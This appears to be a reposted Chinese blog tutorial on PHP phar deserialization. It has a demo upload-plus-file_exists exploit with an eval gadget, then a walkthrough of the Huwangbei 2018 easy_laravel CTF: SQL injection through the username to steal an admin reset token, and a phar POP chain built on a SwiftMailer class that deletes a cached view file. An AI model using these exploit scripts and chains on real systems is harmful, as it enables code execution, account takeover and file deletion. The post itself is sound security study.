2. 程式人生 > >phar 反序列化學習

phar 反序列化學習

阿新 發佈:2018-11-11

前言

pharphp 支援的一種偽協議, 在一些檔案處理函式的路徑引數中使用的話就會觸發反序列操作。

利用條件

  • phar 檔案要能夠上傳到伺服器端。
  • 要有可用的魔術方法作為“跳板” (php 反序列化漏洞的 pop 鏈)。
  • 檔案操作函式的引數可控,且 :/phar 等特殊字元沒有被過濾。

Demo

測試程式碼

測試程式碼如下

upload_file.php

<?php
if (($_FILES["file"]["type"]=="image/gif")&&(substr($_FILES["file"]["name"], strrpos($_FILES["file"]["name"], '.')+1))== 'gif') {
    echo "Upload: " . $_FILES["file"]["name"];
    echo "Type: " . $_FILES["file"]["type"];
    echo "Temp file: " . $_FILES["file"]["tmp_name"];

    if (file_exists("upload_file/" . $_FILES["file"]["name"]))
      {
      echo $_FILES["file"]["name"] . " already exists. ";
      }
    else
      {
      move_uploaded_file($_FILES["file"]["tmp_name"],
      "upload_file/" .$_FILES["file"]["name"]);
      echo "Stored in: " . "upload_file/" . $_FILES["file"]["name"];
      }
    }
else
  {
  echo "Invalid file,you can only upload gif";
  }

實現了一個簡單的上傳功能,只允許上傳 .gif 檔案。

file_un.php

<?php
$filename=$_GET['filename'];
class AnyClass{
    var $output = 'echo "ok";';
    function __destruct()
    {
        eval($this -> output);
    }
}
file_exists($filename);

這裡定義了一個類,在 __destruct 方法中會呼叫 eval 來執行類屬性中的程式碼。

file_exists 的引數我們可控,所以可以通過 phar

來反序列化 AnyClass , 進而實現 程式碼執行。

利用步驟

首先構造一個 phar檔案並上傳到伺服器

<?php
    class AnyClass{
        var $output = 'echo "ok";';
        function __destruct()
        {
            eval($this->output);
        }
    }

    $phar = new Phar('phar.phar');
    $phar->startBuffering();
    $phar->setStub('GIF89a'.'<?php __HALT_COMPILER();?>');   //設定stub,增加gif檔案頭
    $phar->addFromString('test.txt','test');  //新增要壓縮的檔案
    $object = new AnyClass();
    $object->output = 'phpinfo();';
    $phar->setMetadata($object);  //將自定義meta-data存入manifest
    $phar->stopBuffering();
?>

然後把 phar.phar 上傳

最後訪問 file_un.php, 使用 phar:// 來觸發反序列化。

護網杯 easy_laravel

測試環境位於

https://github.com/sco4x0/huwangbei2018_easy_laravel

首先使用

php artisan route:list

看看程式中的控制器

發現控制器基本都需要登入才能訪問,其中有些控制器更是需要 admin 許可權。

app/Http/Middleware/AdminMiddleware.php 裡面定義了 admin 許可權判斷的程式碼

class AdminMiddleware
{

    public function __construct(Guard $auth)
    {
        $this->auth = $auth;
    }

    public function handle($request, Closure $next)
    {
        if ($this->auth->user()->email !== '[email protected]') {
            return redirect(route('error'));
        }
        return $next($request);
    }
}

當用戶註冊郵箱為 [email protected] 就有 admin 許可權。

當權限後可以訪問 flag 獲取 flag

class FlagController extends Controller
{
    public function __construct()
    {
        $this->middleware(['auth', 'admin']);
    }

    public function showFlag()
    {
        $flag = file_get_contents('/th1s1s_F14g_2333333');
        return view('auth.flag')->with('flag', $flag);
    }
}

首先我們現在要做的就是想辦法獲取 admin 許可權。嘗試註冊 [email protected] 發現已經被註冊,不能重複註冊。然後去程式碼裡看看有沒有其他漏洞。

最後發現在 NoteController 存在 sql 注入

class NoteController extends Controller
{
    public function __construct()
    {
        $this->middleware('auth');
    }

    public function index(Note $note)
    {
        $username = Auth::user()->name;
        $notes = DB::select("SELECT * FROM `notes` WHERE `author`='{$username}'");
        return view('note', compact('notes'));
    }
}

取我們註冊時用的使用者名稱插入到 sql 語句裡面造成注入。

表的結構可以看 database/migrations/ 。首先用 order by 語句測試發現列數為 5. 然後 union 查詢

發現密碼用 bcrypt 做的 hash , 而且是 40 位元組的隨機字串。所以密碼是沒辦法爆破了。

程式中還有重置密碼的功能,於是可以通過注入獲取重置 [email protected] 需要的 token

然後訪問

http://192.168.245.128/password/reset/f663eb2c795b7d95c91941f9a75934957846114169692d822b9e13737694a72b

[email protected] 的密碼重置掉。

然後就可以登入到 admin 介面

訪問 /flag 發現沒有按照控制器中的程式碼一樣打印出 /th1s1s_F14g_2333333 的內容。

因為舊的快取存在,導致我們看不到 flag , 我們需要刪掉快取檔案, 然後就可以讀到 flag

快取檔案位於

public function getCompiledPath($path)
{
    return $this->cachePath.'/'.sha1($path).'.php';
}

通過

知道使用了nginx 的預設配置,那麼 flag 檔案的完整路徑就是

/usr/share/nginx/html/resources/views/auth/flag.blade.php

經過 sha1 後得到 34e41df0934a75437873264cd28e2d835bc38772.php

所以現在的思路就是

  • 刪掉 34e41df0934a75437873264cd28e2d835bc38772.php
  • 然後訪問 /flag , 獲取 flag

在 UploadController 裡,可以注入 phar 導致反序列化

class UploadController extends Controller
{
    public function __construct()
    {
        $this->middleware(['auth', 'admin']);
        $this->path = storage_path('app/public');
    }

    public function index()
    {
        return view('upload');
    }

    public function upload(UploadRequest $request)
    {
        $file = $request->file('file');
        if (($file && $file->isValid())) {
            $allowed_extensions = ["bmp", "jpg", "jpeg", "png", "gif"];
            $ext = $file->getClientOriginalExtension();
            if(in_array($ext, $allowed_extensions)){
                $file->move($this->path, $file->getClientOriginalName());
                Flash::success('上傳成功');
                return redirect(route('upload'));
            }
        }
        Flash::error('上傳失敗');
        return redirect(route('upload'));
    }

    public function files()
    {
        $files = array_except(Storage::allFiles('public'), ['0']);
        return view('files')->with('files', $files);
    }
 
    public function check(Request $request)
    {
        $path = $request->input('path', $this->path);
        $filename = $request->input('filename', null);
        if($filename){
            if(!file_exists($path . $filename)){
                Flash::error('磁碟檔案已刪除,重新整理檔案列表');
            }else{
                Flash::success('檔案有效');
            }
        }
        return redirect(route('files'));
    }
}

check 函式取了兩個引數拼接成路徑傳給了 file_exists 函式, 而且 upload 可以進行上傳。

所以我們可以通過 phar 來進行反序列化。

全域性搜一下unlink,在Swift_ByteStream_TemporaryFileByteStream的解構函式中存在unlink方法

於是利用這個類來反序列化,刪掉模板檔案即可。

<?php
class Swift_ByteStream_AbstractFilterableInputStream {
    /**
     * Write sequence.
     */
    protected $sequence = 0;
    /**
     * StreamFilters.
     *
     * @var Swift_StreamFilter[]
     */
    private $filters = [];
    /**
     * A buffer for writing.
     */
    private $writeBuffer = '';
    /**
     * Bound streams.
     *
     * @var Swift_InputByteStream[]
     */
    private $mirrors = [];
}
class Swift_ByteStream_FileByteStream extends Swift_ByteStream_AbstractFilterableInputStream {
    /** The internal pointer offset */
    private $_offset = 0;

    /** The path to the file */
    private $_path;

    /** The mode this file is opened in for writing */
    private $_mode;

    /** A lazy-loaded resource handle for reading the file */
    private $_reader;

    /** A lazy-loaded resource handle for writing the file */
    private $_writer;

    /** If magic_quotes_runtime is on, this will be true */
    private $_quotes = false;

    /** If stream is seekable true/false, or null if not known */
    private $_seekable = null;

    /**
     * Create a new FileByteStream for $path.
     *
     * @param string $path
     * @param bool   $writable if true
     */
    public function __construct($path, $writable = false)
    {
        $this->_path = $path;
        $this->_mode = $writable ? 'w+b' : 'rb';

        if (function_exists('get_magic_quotes_runtime') && @get_magic_quotes_runtime() == 1) {
            $this->_quotes = true;
        }
    }

    /**
     * Get the complete path to the file.
     *
     * @return string
     */
    public function getPath()
    {
        return $this->_path;
    }
}
class Swift_ByteStream_TemporaryFileByteStream extends Swift_ByteStream_FileByteStream {
    public function __construct() {
        $filePath = "/usr/share/nginx/html/storage/framework/views/34e41df0934a75437873264cd28e2d835bc38772.php";
        parent::__construct($filePath, true);
    }
    public function __destruct() {
        if (file_exists($this->getPath())) {
            @unlink($this->getPath());
        }
    }
}
$obj = new Swift_ByteStream_TemporaryFileByteStream();
$p = new Phar('./1.phar', 0);
$p->startBuffering();
$p->setStub('GIF89a<?php __HALT_COMPILER(); ?>');
$p->setMetadata($obj);
$p->addFromString('1.txt','text');
$p->stopBuffering();
rename('./1.phar', '1.gif');
?>

把生成的檔案改成圖片字尾上傳上去, 會儲存到 storage/app/public/ 目錄, 然後用 phar 反序列化

然後在 訪問 /flag 獲取 flag

參考

https://xz.aliyun.com/t/2715#toc-8
https://www.anquanke.com/post/id/161849#h2-3
https://xz.aliyun.com/t/2912#toc-1
http://www.venenof.com/index.php/archives/565/

相關推薦

phar 序列學習

前言 phar 是 php 支援的一種偽協議, 在一些檔案處理函式的路徑引數中使用的話就會觸發反序列操作。 利用條件 phar 檔案要能夠上傳到伺服器端。 要有可用的魔術方法作為“跳板” (php 反序列化漏洞的 pop 鏈)。 檔案操作函式的引數可控,且 : 、/、phar 等特殊字

java中的序列序列學習筆記

文件 track 反序列化 out val nts 鼠標 main version 須要序列化的Person類: package cn.itcast_07; import java.io.Serializable; /* * NotSerializableE

phar 序列本地測試

https://xz.aliyun.com/t/2715 看了上邊的文章,然後根據他的程式碼來複現的。   眾多檔案操作函式能反序列化在於使用了 phar_parse_url,之後有呼叫到 phar_var_unserialize。 生成 phar程式碼: 

JNDI注入與序列學習總結

0x01.java RMI RMI(Remote Method Invocation)是專為Java環境設計的遠端方法呼叫機制,遠端伺服器實現具體的Java方法並提供介面,客戶端本地僅需根據介面類的定義,提供相應的引數即可呼叫遠端方法。RMI依賴的通訊協議為JRMP(Java Remote Messag

python序列學習記錄

## pickle與序列化和反序列化 [官方文件](https://docs.python.org/zh-cn/3/library/pickle.html) > 模組 pickle 實現了對一個 Python 物件結構的二進位制序列化和反序列化。 "pickling" 是**將 Python 物件及其所擁

python學習day4之路文件的序列序列

data 多次 文件交互 由於 mps logs json tro 之路 json和pickle序列化和反序列化   json是用來實現不同程序之間的文件交互,由於不同程序之間需要進行文件信息交互,由於用python寫的代碼可能要與其他語言寫的代碼進行數據傳輸,json支持

PHP序列漏洞學習

exc tof target fun 反序 ring 內容 style 字符串 serialize:序列化 unserialize: 反序列化 簡單解釋: serialize 把一個對象轉成字符串形式, 可以用於保存 unserialize 把serialize序列化後的字

Python學習心得(五) random生成驗證碼、MD5加密、pickle與json的序列序列

用法 div com ict file imp randint csdn == # -*- coding:utf-8 -*- import random as rd #驗證碼 import hashlib as hsl #MD5加密 import pickle,json

python學習第四天,列表生產式,匿名函數,生成器,內置函數,叠代器,裝飾器,json和pickle的序列序列

數據 其他 imp 函數名 fun pro serializa and cal 列表生成式,生產器 #列表生成式,可以是代碼更復雜 a = [i for i in range(10)] #這裏的i,可以使用函數來裝飾 print(a) #生產器:就是數據在調用的時候才有

springboot學習(三)————使用HttpMessageConverter進行http序列序列

http 同時 服務 基本上 err cat rod nio decode 以下內容,如有問題,煩請指出,謝謝! 對象的序列化/反序列化大家應該都比較熟悉:序列化就是將object轉化為可以傳輸的二進制,反序列化就是將二進制轉化為程序內部的對象。序列化/反序列化主要體現在

Python學習之-序列序列

什麽是 註意 not 技術分享 js對象 字節 com 操作 是個 1、什麽是序列化與反序列化? # 我們把對象(或變量)從內存變成可存儲或可傳輸的過程稱之為序列化,在python中被稱為picking; # 自定義的類的實例如何保存在一個文件中?如何從文件中讀取數據,並讓

springboot學習——使用HttpMessageConverter進行http序列序列

本文轉發自:https://segmentfault.com/a/1190000012658289 物件的序列化/反序列化大家應該都比較熟悉:序列化就是將object轉化為可以傳輸的二進位制,反序列化就是將二進位制轉化為程式內部的物件。序列化/反序列化主要體現在程式I/O這個過程中,包括網路I/

Java之IO學習(二)物件操作(序列序列

1、內容 序列化就是將物件轉換成位元組序列,方便儲存和轉換 ObjectInputStream--readObject(): 讀入物件,反序列化 ObjectOutputStream--writeO

java學習筆記-設計模式之單例模式如何防止反射及序列漏洞

在前一篇文章中,對單例模式列舉了五種實現方式。其中列舉模式擁有出生光環,天生就沒有反射及反序列化漏洞。針對其他四種實現方式,在本篇文章中對懶漢式單例模式實現進行反射及反序列化漏洞測試。 一、通過反射破解懶漢式單例模式 重新建立測試類TestClientNew,通過反射獲取

C#學習筆記(6)-序列序列

序列化 就是將物件轉換為二進位制 反序列化 就是將二進位制轉換為物件 作用 傳輸資料。資料在網路中是以二進位制形式傳輸的。 序列化的類不能被繼承 關鍵字 [Serializable]:定義一個類可被序列化 [Serializable]

從原始碼中學習設計模式系列——單例模式序/序列以及反射攻擊的問題(二)

一、前言 這篇文章是學習單例模式的第二篇,之前的文章一下子就給出來看起來很高大上的實現方法,但是這種模式還是存在漏洞的,具體有什麼問題,大家可以停頓一會兒,思考一下。好了,不賣關子了,下面我們來看看每種單例模式存在的問題以及解決辦法。 二、每種Singleton 模式的演進  模式一

Java學習筆記(十三)--序列序列與無參建構函式

概念序列化:將物件儲存到磁碟中,或允許在網路中直接傳輸物件,物件序列化機制允許把記憶體中的Java物件轉換成平臺無關的二進位制,從而可以持久的儲存在磁碟上,也可以在網路中傳輸。反序列化:程式一旦獲得了序

序列序列與jsoncpp學習

json是序列化與反序列化的一種方式。 1. 什麼叫序列化和反序列化?用途是什麼? 把物件轉換為位元組序列的過程稱為物件的序列化。 把位元組序列恢復為物件的過程稱為物件的反序列化。 1) 把物件的位元組序列永久地儲存到硬碟上,通常存放在一

java的序列序列總結---學習筆記

  java的序列化 和 反序列化 1、我們先看一下《java程式設計思想》第四版中對序列化定義 物件序列化Java 1.1 增添了一種有趣的特性,名為“物件序列化”( Object Serialization)。它面向那些實現了 Serializable 介面的物件,可

Typecho-序列漏洞學習

exce wak branch 有趣 params 機制 except 出錯 array 目錄 Typecho-反序列化漏洞學習 0x00 前言 0x01 分析過程 0x0